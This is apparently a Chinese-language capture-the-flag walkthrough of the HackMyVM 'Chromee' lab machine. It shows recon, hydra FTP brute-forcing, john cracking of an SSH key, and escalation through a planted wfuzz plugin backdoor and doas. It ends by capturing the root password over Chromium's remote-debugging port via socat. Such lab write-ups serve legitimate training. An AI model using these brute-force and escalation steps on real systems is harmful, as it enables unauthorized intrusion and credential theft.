lvzhouhang
0%

HackmyVM-Chromee

发表于 分类于
本文字数: 8.2k 阅读时长 ≈ 7 分钟

信息搜集

arp-scan -l

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:01:8c:4d       PCS Systemtechnik GmbH
192.168.31.100  08:00:27:f9:e1:65       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.402 seconds (106.58 hosts/sec). 3 responded

ip为192.168.31.100,然后用nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.100 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 07:14 EDT
Nmap scan report for chromee.hmv (192.168.31.100)
Host is up (0.0019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8080/tcp  open  http-proxy
23333/tcp open  elxmgmt
MAC Address: 08:00:27:F9:E1:65 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds

80端口

gobuster扫描目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-me
dium.txt -x .txt,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php             (Status: 200) [Size: 3]
/secret.php           (Status: 200) [Size: 549]

有一个post.php和secret.php,secret.php不会解析成php会直接下载下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#secret.php
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
    <?php
    $greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
    $visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);

    echo "<h1>{$greeting},adriana</h1>";
    echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
    echo "<p>你的IP:{$visitorIP}</p>";
    if (isset($_GET['aaa'])) {
    	$file_content = file_get_contents('/opt/note/dic.txt');
    	echo $file_content;
	} else {
    		die();
	}
    ?>
</body>
</html>

8080端口

先用gobuster扫描一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100:8080" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2
.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.100:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 328] [--> http://192.168.31.100:8080/javascript/]
/silence              (Status: 403) [Size: 281]
/server-status        (Status: 403) [Size: 281]

有一个silence,访问发现Forbidden了

用bp的BypassPro插件发现换一种请求会变成301,感觉有问题,后面添加一个index.html发现绕过了

有一个邮箱,将这个域名添加进hosts里,再去访问http://chromee.hmv/secret.php发现secret.php解析了,GET传入aaa=1

1
2
3
4
5
6
下午好,adriana
当前时间:2025-03-21 12:28:34

你的IP:192.168.31.1

The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.

这里有两个人名,adriana和Lily,用cupp各生成一个字典,然后将两个字典合并爆破ftp(23333端口)

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# hydra -L ./name -P ./pass 192.168.31.100 ftp -s 23333 -f  -t 50
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 07:32:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 208 login tries (l:2/p:104), ~5 tries per task
[DATA] attacking ftp://192.168.31.100:23333/
[23333][ftp] host: 192.168.31.100   login: adriana   password: Lily2020
[STATUS] attack finished for 192.168.31.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 07:32:31

爆破出了账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ftp adriana@192.168.31.100 23333
Connected to 192.168.31.100.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||20808|)
150 Here comes the directory listing.
drwxr-xr-x    2 106      115          4096 Mar 09 08:13 .
drwxr-xr-x    4 0        0            4096 Mar 09 08:12 ..
-rw-r--r--    1 0        0            3414 Mar 09 08:13 ...
-rw-r--r--    1 0        0             495 Mar 07 14:40 dic.txt
226 Directory send OK.

这有…文件,一开始以为是一个目录,cd不进去,也不看报错就没管了(唉,细节决定成败)导致卡了好长时间,但是卡的时候也没有荒废,在/srv目录下有一个zeus.conf,后面提权要用到

1
2
3
4
5
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
1
2
3
4
5
6
7
8
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5941|)
150 Here comes the directory listing.
drwxr-x---    5 1000     1000         4096 Mar 21 08:18 follower
drwxr-x---    5 1001     1001         4096 Mar 21 05:37 softly
226 Directory send OK.

还可以知道用户名

…文件是一个私钥,john可以爆破出来密码

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# john 1 --show
id:cassandra
1
2
3
4
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ssh follower@192.168.31.100 -i id
Enter passphrase for key 'id':
follower@Chromee:~$

提权

follower下有一个cat.git和note.txt

1
2
3
4
5
follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets.


47 is not just a number, it's a twist of fate.

这个47提示的很明显是rot47

cat.gif用convert可以分离出来12张图片,但是没有用

1
convert cat.gif 1.jpg

不是空间轴可以试试时间轴

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6

将后面的6个6去掉扔进cyberchef中解密然后rot47解密

得到了p3p573r,因为前面拿到的zeus.conf能够知道follower需要密码才能以softly执行wfuzz

先用find找到wfuzz的路径

1
2
3
4
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find / -name "wfuzz" 2>/dev/null
/home/follower/.config/wfuzz
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz    #这个就是wfuzz的路径
1
2
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find ./ -writable 2>/dev/null
./plugins/payloads/file.py

在他的wfuzz的目录下找可以写的文件能找到file.py,cat一下

1
2
3
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")

不用想了,肯定是作者降低难度了后门都留好了

1
2
3
4
follower@Chromee:~$ /usr/local/bin/doas -u softly /usr/local/bin/wfuzz -z file -u "127.0.0.1"
Password:
 /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@Chromee:/home/follower$

上传pspy64,能发现每隔一段时间root用户都会执行secript.sh

1
2
2025/03/21 12:53:01 CMD: UID=0     PID=1504   | /bin/sh -c /root/script.sh
2025/03/21 12:53:01 CMD: UID=0     PID=1505   | /bin/bash /root/script.sh

结合题目名Chromee和前面得到的zeus.conf,能猜到肯定和浏览器有关系,运行linpeas.sh能看到/media下有一个debug.kdbx

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# file debug.kdbx
debug.kdbx: PDF document, version 1.7

是一个pdf文件

去网上查这个东西,谷歌浏览器自带这个工具chrome://inspect/,还有这个9222的默认端口(后面要用到)

先写一个authorized_keys

在网上查到开启远程debug的命令

1
doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1

因为靶机没有桌面,所以一定要带上–headless,不然会报错,启动好后再用socat端口转发

1
softly@Chromee:~$ ./socatx64.bin TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222

用谷歌浏览器连接,打开第一个连接

等一会就会发现向127.0.0.1/post.php发送一个key,不用base64解码,这个就是root的密码。

chromium的远程端口必须要是9222默认端口否则他监听不到就很难受